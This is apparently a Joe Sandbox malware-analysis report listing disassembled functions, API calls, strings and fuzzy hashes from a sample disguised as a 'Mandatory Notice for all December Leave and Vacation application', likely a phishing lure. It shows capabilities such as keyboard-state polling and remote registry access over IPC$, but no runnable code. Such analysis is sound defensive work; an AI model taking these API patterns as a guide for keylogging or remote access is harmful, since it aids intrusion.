                                                      • DeleteMenu.USER32(01041708,00000005,00000000,000000F5,?,?), ref: 00FC577D
                                                      • DeleteMenu.USER32(01041708,00000004,00000000), ref: 00FC5785
                                                      • DeleteMenu.USER32(01041708,00000006,00000000), ref: 00FC578D
                                                      • DeleteMenu.USER32(01041708,00000003,00000000), ref: 00FC5795
                                                      • GetMenuItemCount.USER32(01041708), ref: 00FC579D
                                                      • SetMenuItemInfoW.USER32(01041708,00000004,00000000,00000030), ref: 00FC57D3
                                                      • GetCursorPos.USER32(?), ref: 00FC57DD
                                                      • SetForegroundWindow.USER32(00000000), ref: 00FC57E6
                                                      • TrackPopupMenuEx.USER32(01041708,00000000,?,00000000,00000000,00000000), ref: 00FC57F9
                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00FC5805
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                      • String ID:
                                                      • API String ID: 3993528054-0
                                                      • Opcode ID: 3ff51f2e883232e5943f2cc668ad9305dc781be1ecc344a87398fa8658efd1f0
                                                      • Instruction ID: 6bd20711cec8f2069426503a5c98e5a77c58b8dbed0cf4efff29a253b5adeb01
                                                      • Opcode Fuzzy Hash: 3ff51f2e883232e5943f2cc668ad9305dc781be1ecc344a87398fa8658efd1f0
                                                      • Instruction Fuzzy Hash: 9771E571A4060ABFEB219F94CD4AFAABF65FF00B64F240209F5146A1D1C7757890FBA0
                                                      Function 00FBA14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FBA1DC
                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00FBA211
                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00FBA22D
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00FBA249
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00FBA273
                                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00FBA29B
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FBA2A6
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FBA2AB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                      • API String ID: 1687751970-22481851
                                                      • Opcode ID: 8335d412b339ec6e028f65594c2d5c4fcba4c778949ba20d1438c9eb429c5b11
                                                      • Instruction ID: 8ca134ab8788e4112f2a73c16d4ee3b58c596d534d207d0ab7549982980d6301
                                                      • Opcode Fuzzy Hash: 8335d412b339ec6e028f65594c2d5c4fcba4c778949ba20d1438c9eb429c5b11
                                                      • Instruction Fuzzy Hash: 13410576C10629ABDB21EBA4DC85DEEB7B8BF04750F004029F805A7150EB799E05EFA0
                                                      Function 00FE3C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FE2BB5,?,?), ref: 00FE3C1D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                      • API String ID: 3964851224-909552448
                                                      • Opcode ID: 834bc97ffa7244f21f2fb3a4489213f37b228af25afbe3a09d91f69e68360362
                                                      • Instruction ID: 17235e539ee44c51d252f6dc6d5a9a73c3e0694e6b8079db255dd75bf49ab30a
                                                      • Opcode Fuzzy Hash: 834bc97ffa7244f21f2fb3a4489213f37b228af25afbe3a09d91f69e68360362
                                                      • Instruction Fuzzy Hash: 31416F3150028E9BDF10EF15DC49AEA3365BF62310F104854ECD59B792EB74EE0AEB50
                                                      Function 00FC25B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00FF36F4,00000010,?,Bad directive syntax error,0101DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00FC25D6
                                                      • LoadStringW.USER32(00000000,?,00FF36F4,00000010), ref: 00FC25DD
                                                      • _wprintf.LIBCMT ref: 00FC2610
                                                      • __swprintf.LIBCMT ref: 00FC2632
                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00FC26A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                      • API String ID: 1080873982-4153970271
                                                      • Opcode ID: dba3536307faca340730912aece79c338925704a76ce7940e198075b05c378b7
                                                      • Instruction ID: 108fe6db638bc63fe452d85568aeb8397cb795d7d50b205d5ccabaff9e8cda76
                                                      • Opcode Fuzzy Hash: dba3536307faca340730912aece79c338925704a76ce7940e198075b05c378b7
                                                      • Instruction Fuzzy Hash: E021607190021ABFCF12BF90CC4AFEE7B79FF18704F004459F5056A052DA79A518EB60
                                                      Function 00FC7AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00FC7B42
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00FC7B58
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FC7B69
                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00FC7B7B
                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00FC7B8C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: SendString
                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                      • API String ID: 890592661-1007645807
                                                      • Opcode ID: f70b40835a56da5cbf23bed3534b06d8abad1f8f20374babd97d24d68771d6b5
                                                      • Instruction ID: dae6eb11e9b91f87c0abf9d39c5d1621ec92d4380b2397166d85f7b38381b73e
                                                      • Opcode Fuzzy Hash: f70b40835a56da5cbf23bed3534b06d8abad1f8f20374babd97d24d68771d6b5
                                                      • Instruction Fuzzy Hash: 0D11B2A1A4025A79D731B3A2CC8AEFFBA7CFFD1B10F00041D7451AA081EA641D48DAB0
                                                      Function 00FC778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • timeGetTime.WINMM ref: 00FC7794
                                                        • Part of subcall function 00F9DC38: timeGetTime.WINMM(?,75A8B400,00FF58AB), ref: 00F9DC3C
                                                      • Sleep.KERNEL32(0000000A), ref: 00FC77C0
                                                      • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00FC77E4
                                                      • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00FC7806
                                                      • SetActiveWindow.USER32 ref: 00FC7825
                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00FC7833
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00FC7852
                                                      • Sleep.KERNEL32(000000FA), ref: 00FC785D
                                                      • IsWindow.USER32 ref: 00FC7869
                                                      • EndDialog.USER32(00000000), ref: 00FC787A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                      • String ID: BUTTON
                                                      • API String ID: 1194449130-3405671355
                                                      • Opcode ID: fe081e1d2f815021a1e3492740c58644e015ac3578e538ebff95e87e0c2718c6
                                                      • Instruction ID: 60d0622ec3c644467613e213cc686592f143cff8e3c115f92b09d5750597a0b3
                                                      • Opcode Fuzzy Hash: fe081e1d2f815021a1e3492740c58644e015ac3578e538ebff95e87e0c2718c6
                                                      • Instruction Fuzzy Hash: C82156B4504306AFE7256BA0DECAF257F39FB44759F105018F58586289CF6B5C04EB21
                                                      Function 00FD02EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F8936C: __swprintf.LIBCMT ref: 00F893AB
                                                        • Part of subcall function 00F8936C: __itow.LIBCMT ref: 00F893DF
                                                      • CoInitialize.OLE32(00000000), ref: 00FD034B
                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00FD03DE
                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00FD03F2
                                                      • CoCreateInstance.OLE32(0100DA8C,00000000,00000001,01033CF8,?), ref: 00FD043E
                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00FD04AD
                                                      • CoTaskMemFree.OLE32(?,?), ref: 00FD0505
                                                      • _memset.LIBCMT ref: 00FD0542
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00FD057E
                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00FD05A1
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00FD05A8
                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00FD05DF
                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 00FD05E1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                      • String ID:
                                                      • API String ID: 1246142700-0
                                                      • Opcode ID: 4843038424d08f0fbd998f370b2f27778ab6857c173729371dc3cf6ca3d38814
                                                      • Instruction ID: 98d0d45fe4fced200de8613af096fbb88d766236edffcd2088548a1127d4dd95
                                                      • Opcode Fuzzy Hash: 4843038424d08f0fbd998f370b2f27778ab6857c173729371dc3cf6ca3d38814
                                                      • Instruction Fuzzy Hash: D6B1E875A00109AFDB14DFA4C889EAEBBB9FF48314F148459E809EB251DB35ED41DB60
                                                      Function 00FC2E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00FC2ED6
                                                      • SetKeyboardState.USER32(?), ref: 00FC2F41
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00FC2F61
                                                      • GetKeyState.USER32(000000A0), ref: 00FC2F78
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00FC2FA7
                                                      • GetKeyState.USER32(000000A1), ref: 00FC2FB8
                                                      • GetAsyncKeyState.USER32(00000011), ref: 00FC2FE4
                                                      • GetKeyState.USER32(00000011), ref: 00FC2FF2
                                                      • GetAsyncKeyState.USER32(00000012), ref: 00FC301B
                                                      • GetKeyState.USER32(00000012), ref: 00FC3029
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00FC3052
                                                      • GetKeyState.USER32(0000005B), ref: 00FC3060
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: 3080942acda3d90f549b2458d8a0b44219b14ce090fad449043daf4a65eaad67
                                                      • Instruction ID: 62a1b0761e31e15bc8f3b75878a48a0ef1003e888116d1df3e9aa1fa812484a2
                                                      • Opcode Fuzzy Hash: 3080942acda3d90f549b2458d8a0b44219b14ce090fad449043daf4a65eaad67
                                                      • Instruction Fuzzy Hash: 87513C21E0479A29FB35DBA48A12FEEBFF48F01394F08858DC5C2561C2DA549B4CD7A2
                                                      Function 00FBED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000001), ref: 00FBED1E
                                                      • GetWindowRect.USER32(00000000,?), ref: 00FBED30
                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00FBED8E
                                                      • GetDlgItem.USER32(?,00000002), ref: 00FBED99
                                                      • GetWindowRect.USER32(00000000,?), ref: 00FBEDAB
                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00FBEE01
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00FBEE0F
                                                      • GetWindowRect.USER32(00000000,?), ref: 00FBEE20
                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00FBEE63
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00FBEE71
                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00FBEE8E
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00FBEE9B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                      • String ID:
                                                      • API String ID: 3096461208-0
                                                      • Opcode ID: fa005084785d8843c6af360ab0481bcac0fd88ecfb4062b59a182f53f1b09be2
                                                      • Instruction ID: 77f9cfbdb406cd09bd84a78207639ab9cd37d055ee1009d4237ac71a3d749134
                                                      • Opcode Fuzzy Hash: fa005084785d8843c6af360ab0481bcac0fd88ecfb4062b59a182f53f1b09be2
                                                      • Instruction Fuzzy Hash: B4513FB1B00205AFDB18CFA9CD85AAEBBBAFB88310F148129F519D7284D775DD008B10
                                                      Function 00F9B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F9B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F9B759,?,00000000,?,?,?,?,00F9B72B,00000000,?), ref: 00F9BA58
                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00F9B72B), ref: 00F9B7F6
                                                      • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00F9B72B,00000000,?,?,00F9B2EF,?,?), ref: 00F9B88D
                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00FFD8A6
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F9B72B,00000000,?,?,00F9B2EF,?,?), ref: 00FFD8D7
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F9B72B,00000000,?,?,00F9B2EF,?,?), ref: 00FFD8EE
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F9B72B,00000000,?,?,00F9B2EF,?,?), ref: 00FFD90A
                                                      • DeleteObject.GDI32(00000000), ref: 00FFD91C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                      • String ID:
                                                      • API String ID: 641708696-0
                                                      • Opcode ID: 9e016943e1a3367ccc9d2b3328f1d49a7bb58a6820fbb17f603fa502f6979f2a
                                                      • Instruction ID: 7651bd44eb8bbbae984226d2888808189b768e4bd4e4d82522549727a495068b
                                                      • Opcode Fuzzy Hash: 9e016943e1a3367ccc9d2b3328f1d49a7bb58a6820fbb17f603fa502f6979f2a
                                                      • Instruction Fuzzy Hash: 6661CF71901600DFEF369F94EA88B3577F6FF88322F14461DE18646A64C77AB880EB41
                                                      Function 00F9B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F9B526: GetWindowLongW.USER32(?,000000EB), ref: 00F9B537
                                                      • GetSysColor.USER32(0000000F), ref: 00F9B438
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ColorLongWindow
                                                      • String ID:
                                                      • API String ID: 259745315-0
                                                      • Opcode ID: 60c0c7a4f5d4e2ebff33fcf46a2fa7ad944a5e95396990633f5223d0ac8b0a94
                                                      • Instruction ID: 97c2ba044559672f8c9a86cd98a07a0efe754f581a94f052c41dd6b59aa524f4
                                                      • Opcode Fuzzy Hash: 60c0c7a4f5d4e2ebff33fcf46a2fa7ad944a5e95396990633f5223d0ac8b0a94
                                                      • Instruction Fuzzy Hash: 2041B531400104AFEF259F6CE989BB93B66AF45731F144261FEA58A1E6C7358C41F721
                                                      Function 00FC690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                      • String ID:
                                                      • API String ID: 136442275-0
                                                      • Opcode ID: f65edef11d415add4c4a297565c22db6c76bb5ba979e6f8457c71742fd809619
                                                      • Instruction ID: bc55637998d7f2d0cfd45f627c6cc9f484251f422003462d06a6ccd7257031bf
                                                      • Opcode Fuzzy Hash: f65edef11d415add4c4a297565c22db6c76bb5ba979e6f8457c71742fd809619
                                                      • Instruction Fuzzy Hash: 6B414FB784521DAECF61DB90DC46DCA73BCEB45310F0041A6B649E2041EE34ABE59F60
                                                      Function 00FCD76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharLowerBuffW.USER32(0101DC00,0101DC00,0101DC00), ref: 00FCD7CE
                                                      • GetDriveTypeW.KERNEL32(?,01033A70,00000061), ref: 00FCD898
                                                      • _wcscpy.LIBCMT ref: 00FCD8C2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                      • API String ID: 2820617543-1000479233
                                                      • Opcode ID: 774b146829c47bc93b05927ed75ee3b3a3f0de162077edd67b11384db6082dbb
                                                      • Instruction ID: 94220d505da15ab7a21b1444ca9e17340ad625a75df90061ad45f60327ca78e5
                                                      • Opcode Fuzzy Hash: 774b146829c47bc93b05927ed75ee3b3a3f0de162077edd67b11384db6082dbb
                                                      • Instruction Fuzzy Hash: F5518E35904205AFD700EF14DD92FAEB7A5FF84324F10882DF49A5B2A2EB35D905EB42
                                                      Function 00F8936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __swprintf.LIBCMT ref: 00F893AB
                                                      • __itow.LIBCMT ref: 00F893DF
                                                        • Part of subcall function 00FA1557: _xtow@16.LIBCMT ref: 00FA1578
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
